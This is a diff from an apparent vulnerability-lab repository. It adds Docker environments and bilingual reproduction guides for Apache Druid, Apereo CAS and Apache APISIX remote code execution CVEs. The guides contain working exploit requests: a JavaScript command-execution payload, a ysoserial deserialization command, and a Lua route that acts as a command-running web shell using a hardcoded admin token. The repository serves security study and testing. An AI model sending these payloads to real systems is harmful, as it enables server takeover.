apache-cxf/CVE-2024-28752/docker-compose.yml Normal file
View File

@@ -0,0 +1,5 @@
services:
cxf:
image: vulhub/apache-cxf:3.2.14
ports:
- "8080:8080"

BIN
apache-druid/CVE-2021-25646/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 102 KiB

77
apache-druid/CVE-2021-25646/README.md Normal file
View File

@@ -0,0 +1,77 @@
# Apache Druid Embedded Javascript Remote Code Execution (CVE-2021-25646)
[中文版本(Chinese version)](README.zh-cn.md)
Apache Druid is an open source, distributed data store that is designed for ingesting high volumes of data to provide instant data visibility, ad-hoc analytics and queries with low latency and high concurrency.
Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
References:
- <https://blogs.juniper.net/en-us/threat-research/cve-2021-25646-apache-druid-embedded-javascript-remote-code-execution>
- <https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw>
## Vulnerable Environment
Execute following command to start an Apache Druid server 0.20.0:
```
docker compose up -d
```
After server is started, you can see the home page of Apache Druid on `http://your-ip:8888`.
## Exploit
Send this request to the server:
```
POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
{
"type":"index",
"spec":{
"ioConfig":{
"type":"index",
"firehose":{
"type":"local",
"baseDir":"/etc",
"filter":"passwd"
}
},
"dataSchema":{
"dataSource":"test",
"parser":{
"parseSpec":{
"format":"javascript",
"timestampSpec":{
},
"dimensionsSpec":{
},
"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
"":{
"enabled":"true"
}
}
}
}
},
"samplerConfig":{
"numRows":10
}
}
```
You will see the output of the `id` command:
![](1.png)

75
apache-druid/CVE-2021-25646/README.zh-cn.md Normal file
View File

@@ -0,0 +1,75 @@
# Apache Druid 代码执行漏洞CVE-2021-25646
Apache Druid是一个开源的分布式数据存储。
Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用并且默认是禁用的。然而在Druid 0.20.0及以前的版本中攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码而不管服务器配置如何这将导致代码和命令执行漏洞。
参考链接:
- <https://blogs.juniper.net/en-us/threat-research/cve-2021-25646-apache-druid-embedded-javascript-remote-code-execution>
- <https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw>
## 漏洞环境
执行如下命令启动一个Apache Druid 0.20.0服务器:
```
docker compose up -d
```
服务启动后,访问`http://your-ip:8888`即可查看到Apache Druid主页。
## 漏洞复现
直接发送如下请求即可执行其中的JavaScript代码
```
POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
{
"type":"index",
"spec":{
"ioConfig":{
"type":"index",
"firehose":{
"type":"local",
"baseDir":"/etc",
"filter":"passwd"
}
},
"dataSchema":{
"dataSource":"test",
"parser":{
"parseSpec":{
"format":"javascript",
"timestampSpec":{
},
"dimensionsSpec":{
},
"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
"":{
"enabled":"true"
}
}
}
}
},
"samplerConfig":{
"numRows":10
}
}
```
可见,`id`命令已被成功执行:
![](1.png)

6
apache-druid/CVE-2021-25646/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
version: '2'
services:
web:
image: vulhub/apache-druid:0.20.0
ports:
- "8888:8888"

BIN
apereo-cas/4.1-rce/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 133 KiB

BIN
apereo-cas/4.1-rce/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 263 KiB

BIN
apereo-cas/4.1-rce/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.7 KiB

76
apereo-cas/4.1-rce/README.md Normal file
View File

@@ -0,0 +1,76 @@
# Apereo CAS 4.1 Deserialization RCE Vulnerability
[中文版本(Chinese version)](README.zh-cn.md)
Apereo CAS is a enterprise single sign-on system. There is an issue in CASs attempts to deserialize objects via the Apache Commons Collections library, which cased a RCE vulnerability.
Reference:
- https://apereo.github.io/2016/04/08/commonsvulndisc/
## Environment Setup
Execute following commands to start an Apereo CAS 4.1.5
```
docker compose up -d
```
After the Apereo CAS is started, visiting `http://your-ip:8080/cas/login` to see the login page.
## Exploit
The out-of-the-box default configuration of Apereo CAS before 4.1.7, is using a default secret key `changeit`:
```java
public class EncryptedTranscoder implements Transcoder {
private CipherBean cipherBean;
private boolean compression = true;
public EncryptedTranscoder() throws IOException {
BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
bufferedBlockCipherBean.setKeyAlias("aes128");
bufferedBlockCipherBean.setKeyPassword("changeit");
bufferedBlockCipherBean.setNonce(new RBGNonce());
this.setCipherBean(bufferedBlockCipherBean);
}
// ...
```
We can try to use [Apereo-CAS-Attack](https://github.com/vulhub/Apereo-CAS-Attack) to generate a encrypted [ysoserial](https://github.com/frohoff/ysoserial)'s serialized object:
```
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"
```
![](1.png)
Then, intercept and modify the http request from login action of `/cas/login`, put the payload into `execution`'s value:
```
POST /cas/login HTTP/1.1
Host: your-ip
Content-Length: 2287
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://your-ip:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://your-ip:8080/cas/login
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: JSESSIONID=24FB4BAAE1A66E8B76D521EE366B3E12; _ga=GA1.1.1139210877.1586367734
Connection: close
username=test&password=test&lt=LT-2-gs2epe7hUYofoq0gI21Cf6WZqMiJyj-cas01.example.org&execution=[payload]&_eventId=submit&submit=LOGIN
```
![](2.png)
Congrats, `touch /tmp/success` has been successfully executed:
![](3.png)

74
apereo-cas/4.1-rce/README.zh-cn.md Normal file
View File

@@ -0,0 +1,74 @@
# Apereo CAS 4.1 反序列化命令执行漏洞
Apereo CAS是一款Apereo发布的集中认证服务平台常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。
参考链接:
- https://apereo.github.io/2016/04/08/commonsvulndisc/
## 环境搭建
执行如下命令启动一个Apereo CAS 4.1.5
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080/cas/login`即可查看到登录页面。
## 漏洞复现
漏洞原理实际上是Webflow中使用了默认密钥`changeit`
```java
public class EncryptedTranscoder implements Transcoder {
private CipherBean cipherBean;
private boolean compression = true;
public EncryptedTranscoder() throws IOException {
BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
bufferedBlockCipherBean.setKeyAlias("aes128");
bufferedBlockCipherBean.setKeyPassword("changeit");
bufferedBlockCipherBean.setNonce(new RBGNonce());
this.setCipherBean(bufferedBlockCipherBean);
}
// ...
```
我们使用[Apereo-CAS-Attack](https://github.com/vulhub/Apereo-CAS-Attack)来复现这个漏洞。使用ysoserial的CommonsCollections4生成加密后的Payload
```
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"
```
![](1.png)
然后我们登录CAS并抓包将Body中的`execution`值替换成上面生成的Payload发送
```
POST /cas/login HTTP/1.1
Host: your-ip
Content-Length: 2287
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://your-ip:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://your-ip:8080/cas/login
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: JSESSIONID=24FB4BAAE1A66E8B76D521EE366B3E12; _ga=GA1.1.1139210877.1586367734
Connection: close
username=test&password=test&lt=LT-2-gs2epe7hUYofoq0gI21Cf6WZqMiJyj-cas01.example.org&execution=[payload]&_eventId=submit&submit=LOGIN
```
![](2.png)
登录Apereo CAS可见`touch /tmp/success`已成功执行:
![](3.png)

6
apereo-cas/4.1-rce/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
version: '2'
services:
web:
image: vulhub/apereo-cas:4.1.5
ports:
- "8080:8080"

BIN
apisix/CVE-2020-13945/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 133 KiB

BIN
apisix/CVE-2020-13945/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 47 KiB

59
apisix/CVE-2020-13945/README.md Normal file
View File

@@ -0,0 +1,59 @@
# Apache APISIX Hardcoded API Token Leads to RCE (CVE-2020-13945)
[中文版本(Chinese version)](README.zh-cn.md)
Apache APISIX is a dynamic, real-time, high-performance API gateway. Apache APISIX has a default built-in API token `edd1c9f034335f136f87ad84b625c8f1` that can be used to access all the admin API, which leads to the remote LUA code execution through the `script` parameter added in the 2.x version.
References:
- https://apisix.apache.org/docs/apisix/getting-started
- https://github.com/apache/apisix/pull/2244
- https://seclists.org/oss-sec/2020/q4/187
## Vulnerability Environment
Execute following command to start a Apache APISIX server 2.11.0 (this vulnerability hasn't been fixed until newest version, might be not considered fixing by vendor):
```
docker compose up -d
```
After the server is started, you can see a default 404 page at `http://your-ip:9080`.
## Vulnerability Reproduce
Add a new evil router rule to the APISIX through admin api with default token:
```
POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406
{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}
```
![](1.png)
Then, use this evil router to execute arbitrary commands:
```
http://your-ip:9080/attack?cmd=id
```
![](2.png)

57
apisix/CVE-2020-13945/README.zh-cn.md Normal file
View File

@@ -0,0 +1,57 @@
# Apache APISIX 默认API Token导致远程Lua代码执行CVE-2020-13945
Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`攻击者利用这个Token可以访问到管理员接口进而通过`script`参数来插入任意LUA脚本并执行。
参考链接:
- https://apisix.apache.org/docs/apisix/getting-started
- https://github.com/apache/apisix/pull/2244
- https://seclists.org/oss-sec/2020/q4/187
## 漏洞环境
执行如下命令启动一个Apache APISIX 2.11.0(这个漏洞并没有且应该不会被官方修复,所以到最新版仍然存在):
```
docker compose up -d
```
环境启动后,访问`http://your-ip:9080`即可查看到默认的404页面。
## 漏洞复现
利用默认Token增加一个恶意的router其中包含恶意LUA脚本
```
POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406
{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}
```
![](1.png)
然后我们访问刚才添加的router就可以通过cmd参数执行任意命令
```
http://your-ip:9080/attack?cmd=id
```
![](2.png)

34
apisix/CVE-2020-13945/config.yml Normal file
View File

@@ -0,0 +1,34 @@
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
apisix:
node_listen: 9080 # APISIX listening port
enable_ipv6: false
allow_admin: # http://nginx.org/en/docs/http/ngx_http_access_module.html#allow
- 0.0.0.0/0 # We need to restrict ip access rules for security. 0.0.0.0/0 is for test.
enable_control: true
control:
ip: "0.0.0.0"
port: 9092
etcd:
host: # it's possible to define multiple etcd hosts addresses of the same etcd cluster.
- "http://etcd:2379" # multiple etcd address
prefix: "/apisix" # apisix configurations prefix
timeout: 30 # 30 seconds

22
apisix/CVE-2020-13945/docker-compose.yml Normal file
View File

@@ -0,0 +1,22 @@
version: "2"
services:
apisix:
image: vulhub/apisix:2.11.0
volumes:
- ./config.yml:/usr/local/apisix/conf/config.yaml:ro
depends_on:
- etcd
ports:
- "9080:9080"
- "9091:9091"
- "9443:9443"
etcd:
image: bitnami/etcd:3.4.15
environment:
ETCD_ENABLE_V2: "true"
ALLOW_NONE_AUTHENTICATION: "yes"
ETCD_ADVERTISE_CLIENT_URLS: "http://0.0.0.0:2379"
ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379"
ports:
- "2379:2379/tcp"

BIN
apisix/CVE-2021-45232/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 115 KiB

BIN
apisix/CVE-2021-45232/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 38 KiB

54
apisix/CVE-2021-45232/README.md Normal file
View File

@@ -0,0 +1,54 @@
# Apache APISIX Dashboard Unauthenticated Access Leads to RCE (CVE-2021-45232)
[中文版本(Chinese version)](README.zh-cn.md)
Apache APISIX is a dynamic, real-time, high-performance API gateway, and Apache APISIX Dashboard is a easy to use frontend interface that is used to manage the Apache APISIX.
In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`. But there are 2 of these APIs `/apisix/admin/migrate/export` and `/apisix/admin/migrate/import` directly use the interface of framework `gin` which are able to bypass the authentication.
By using these 2 unauthenticated API endpoints, attackers can export and import arbitrary Apache APISIX configuration including routers, services, scripts etc, that leads to reqeust unexpected URL (SSRF) or execute arbitrary LUA scripts (RCE).
References:
- https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232/
- https://github.com/wuppp/cve-2021-45232-exp
## Vulnerable environment
Execute following command to start a vulnerable Apache APISIX Dashboard 2.9:
```
docker compose up -d
```
Then you can access `http://your-ip:9000/` to see the login page for Apache APISIX Dashboard.
## Exploit
`/apisix/admin/migrate/export` and `/apisix/admin/migrate/import` are 2 unauthenticated API provided by Apache APISIX Dashboard, that are used to export and import configuration for Apache APISIX. So we can simplely import a craft configuration with evil router that contains user provided LUA script:
![](1.png)
Noted that the last 4 bytes are CRC checksum of this file, so it's better to use a automatic POC to build and send the request, for example [this POC](https://github.com/wuppp/cve-2021-45232-exp).
After adding the evil router, you should send the request to Apache APISIX (difference from Apache APISIX Dashboard) to trigger the LUA script.
The Apache APISIX is listening on port 9080 in this environment:
```
GET /okw1Rh HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Connection: close
CMD: id
Cache-Control: max-age=0
```
![](2.png)
As you can see, the command in `CMD` header is executed by Apache APISIX.

52
apisix/CVE-2021-45232/README.zh-cn.md Normal file
View File

@@ -0,0 +1,52 @@
# Apache APISIX Dashboard API权限绕过导致RCECVE-2021-45232
Apache APISIX是一个动态、实时、高性能API网关而Apache APISIX Dashboard是一个配套的前端面板。
Apache APISIX Dashboard 2.10.1版本前存在两个API`/apisix/admin/migrate/export``/apisix/admin/migrate/import`,他们没有经过`droplet`框架的权限验证导致未授权的攻击者可以导出、导入当前网关的所有配置项包括路由、服务、脚本等。攻击者通过导入恶意路由可以用来让Apache APISIX访问任意网站甚至执行LUA脚本。
参考链接:
- https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
- https://github.com/wuppp/cve-2021-45232-exp
## 漏洞环境
执行如下命令启动一个有漏洞的Apache APISIX Dashboard 2.9
```
docker compose up -d
```
然后访问`http://your-ip:9000/`即可看到Apache APISIX Dashboard的登录页面。
## 漏洞复现
利用`/apisix/admin/migrate/export``/apisix/admin/migrate/import`两个Apache APISIX Dashboard提供的未授权API我们可以简单地导入一个恶意配置文件其中包含我们构造的LUA脚本
![](1.png)
注意的是这个配置文件的最后4个字符是当前文件的CRC校验码所以最好通过自动化工具来生成和发送这个利用数据包比如[这个POC](https://github.com/wuppp/cve-2021-45232-exp)。
添加完恶意路由后你需要访问Apache APISIX中对应的路径来触发前面添加的脚本。值得注意的是Apache APISIX和Apache APISIX Dashboard是两个不同的服务Apache APISIX Dashboard只是一个管理页面而添加的路由是位于Apache APISIX中所以需要找到Apache APISIX监听的端口或域名。
在当前环境下Apache APISIX监听在9080端口下。我们发送数据包
```
GET /okw1Rh HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Connection: close
CMD: id
Cache-Control: max-age=0
```
![](2.png)
可见我们在Header中添加的`CMD`头中的命令已被执行。
这个漏洞是Apache APISIX Dashboard的漏洞而Apache APISIX无需配置IP白名单或管理API只要二者连通同一个etcd即可。

Some files were not shown because too many files have changed in this diff Show More